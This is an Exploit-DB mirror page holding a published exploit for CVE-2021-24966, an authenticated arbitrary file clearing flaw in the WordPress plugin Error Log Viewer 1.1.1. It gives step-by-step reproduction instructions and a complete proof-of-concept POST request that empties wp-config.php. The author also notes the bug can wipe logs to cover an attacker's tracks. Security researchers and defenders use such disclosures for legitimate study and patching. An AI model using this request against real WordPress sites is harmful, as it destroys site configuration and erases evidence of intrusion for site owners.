bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50746.txt
Offensive Security a300bd948f DB: 2022-02-17 
8 changes to exploits/shellcodes

TeamSpeak 3.5.6 - Insecure File Permissions
Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path

H3C SSL VPN - Username Enumeration
Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
ServiceNow - Username Enumeration
Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
2022-02-17 05:01:36 +00:00

45 lines
No EOL
2.8 KiB
Text
Raw Blame History

# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# Description:
Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
# Steps To Reproduce
1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.
# PoC - Supported Materials
---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]
rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------
Reference in a new issue View git blame Copy permalink